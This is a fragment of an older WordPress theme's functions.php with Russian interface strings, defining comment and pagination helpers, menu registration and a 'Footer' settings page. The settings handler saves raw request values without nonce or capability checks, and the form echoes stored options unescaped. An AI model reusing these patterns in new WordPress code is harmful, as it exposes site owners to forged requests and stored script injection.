if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Save changes" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
